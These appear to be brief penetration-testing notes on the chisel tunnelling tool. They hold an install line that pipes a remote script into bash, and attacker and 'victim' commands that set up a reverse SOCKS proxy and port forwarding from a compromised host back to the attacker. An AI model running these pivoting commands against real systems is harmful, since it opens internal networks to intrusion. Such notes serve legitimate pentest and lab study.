installation:

curl https://i.jpillora.com/chisel! | bash

usage:

run on attacker (server on reverse mode):

chisel server --socks5 --reverse -p 1338
  • will output something like this:

run on victim (server on reverse mode):

./chisel client --fingerprint <fingerprint> MYIP:PORT R:8000:10.10.10.5:80
  • or do R:socks set up an automatic socks proxy to use with proxychains
  • can do 0.0.0.0:1337:192.168.50.2:1337 to pass incoming connections to the client on a specific port to our attacker machine on the specified port. use this in place of R: